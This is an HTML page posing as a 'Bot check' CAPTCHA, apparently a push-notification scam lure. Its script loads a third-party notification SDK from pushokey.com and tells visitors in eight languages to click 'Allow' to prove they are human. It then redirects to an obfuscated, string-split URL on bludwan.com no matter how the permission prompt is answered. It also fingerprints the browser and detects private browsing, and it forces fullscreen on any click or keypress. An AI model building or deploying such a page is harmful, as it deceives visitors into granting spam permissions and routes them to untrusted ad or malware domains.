<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Bot check</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        html {
            background-color: #eee
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            background-color: #eee;
            color: #fff;
            font: 300 14px Roboto, Helvetica, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none
        }

        .fix,
        body {
            height: 100%;
            width: 100%
        }

        .fix {
            left: 0;
            position: fixed;
            top: 0;
            z-index: 1
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .wrapper {
            margin: auto;
            max-width: 1400px;
            width: 100%
        }

        .wrapper:after {
            clear: both;
            content: "";
            display: block;
            width: 100%
        }

        .msg {
            background-color: #009dc7;
            border-radius: 3px;
            float: right;
            font-weight: 700;
            line-height: 1.2;
            margin: 10px 10px 10px 0;
            padding: 10px;
            width: 165px
        }

        .isPopup .msg {
            margin-bottom: 50px
        }

        .isYandex .msg {
            float: left;
            margin-left: 10px
        }

        .wImages {
            clear: both;
            float: left;
            padding-top: 60px;
            position: relative;
            width: 310px
        }

        .isYandex .wImages {
            float: right;
            margin-right: 0
        }

        .isPopup .wImages {
            margin-left: 30px
        }

        .wImages__arrow {
            -webkit-animation: a 1s infinite;
            animation: a 1s infinite;
            left: 22.5%;
            position: absolute;
            top: 0;
            width: 33.55%
        }

        .wImages__robot {
            max-width: 100%;
            vertical-align: top
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {

            0%,
            50%,
            to {
                opacity: 1
            }

            25%,
            75% {
                opacity: 0
            }
        }

        @keyframes a {

            0%,
            50%,
            to {
                opacity: 1
            }

            25%,
            75% {
                opacity: 0
            }
        }

        @media (min-width:425px) {
            .msg {
                font-size: 18px;
                width: 205px
            }

            .wImages {
                width: 375px
            }

            .wImages__arrow {
                left: 24%;
                width: 29.5%
            }

            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:535px) {
            .msg {
                font-size: 18px;
                width: 220px
            }

            .wImages {
                margin-left: 160px
            }
        }

        @media (min-width:700px) {
            .msg {
                font-size: 20px;
                width: 220px
            }

            .wImages {
                margin-left: 80px;
                width: auto
            }

            .isPopup .wImages {
                margin-left: 0
            }

            .wImages__arrow {
                left: 26%;
                width: auto
            }

            .isYandex .wImages__arrow {
                left: 35%;
                transform: rotate(90deg)
            }
        }

        @media (min-width:810px) {
            .msg {
                font-size: 22px;
                padding: 20px;
                width: 300px
            }

            body:-webkit-full-screen .wImages {
                margin-left: 0
            }

            body:-moz-full-screen .wImages {
                margin-left: 0
            }

            body:-ms-fullscreen .wImages {
                margin-left: 0
            }

            body:fullscreen .wImages {
                margin-left: 0
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blud', 'wan.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2490306&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div class="fix"></div>
    <div class="msg"></div>
    <div class="wImages"><img src="images/bot-detect/arrow.png" alt="image" class="wImages__arrow"><img src="images/bot-detect/robot-men.png" alt="image" class="wImages__robot">
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();

            var v = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function r() {
                            return n(e)
                        }
                        if ("safari" === v.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === v.n) {
                            var i = indexedDB.open("test.html");
                            i.addEventListener("error", o), i.addEventListener("success", r)
                        } else {
                            if ("edge" === v.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== v.n && "yandex" !== v.n && "chrome" !== v.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, r, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            r = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            i = /UBrowser/.test(this.ua),
                            s = /Edge\//.test(this.ua),
                            a = null;
                        return e ? a = "opera" : n ? a = "firefox" : r ? a = "yandex" : i ? a = "uc" : s ? a = "edge" : o ? a = "chrome" : t && (a = "safari"), a
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== v.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                p = v;

            var y = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (y.k = navigator.language.slice(0, 2)), void 0 === e[y.k] && (y.k = "en"), y.t = e[y.k]
                    },
                    get: function(e) {
                        return y.t[e]
                    }
                },
                b = y;
            b.set({
                ru: {
                    msg: 'Нажмите "Разрешить", чтобы подтвердить, что вы не робот',
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    msg: 'Press "Allow" to verify, that you are not robot',
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    msg: 'Cliquez sur "Autoriser" pour confirmer que vous n\'êtes pas un robot',
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    msg: 'Klicken Sie "Zulassen", wenn Sie kein Roboter sind',
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    msg: 'Haga clic en "Permitir" para confirmar que no es un robot',
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    msg: 'Натисніть "Дозволити" щоб підтвердити, що ви не бот',
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    msg: 'Kliknij "Zezwalaj", aby potwierdzić, że nie jesteś botem',
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    msg: " คลิกอนุญาตเพื่อยืนยันว่าคุณไม่ใช่บอต",
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), "android" === p.d && document.querySelector(".wImages__arrow").classList.add("isHide"), null !== window.opener && document.body.classList.add("isPopup"), "yandex" === p.n && document.body.classList.add("isYandex"), document.querySelector(".msg").textContent = b.get("msg"), document.querySelector(".msgReady__tx").innerHTML = b.get("msgReady")

    </script>
    <script>
      var t = function() {
          void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
      };
      document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
    </script>

</body>


</html>
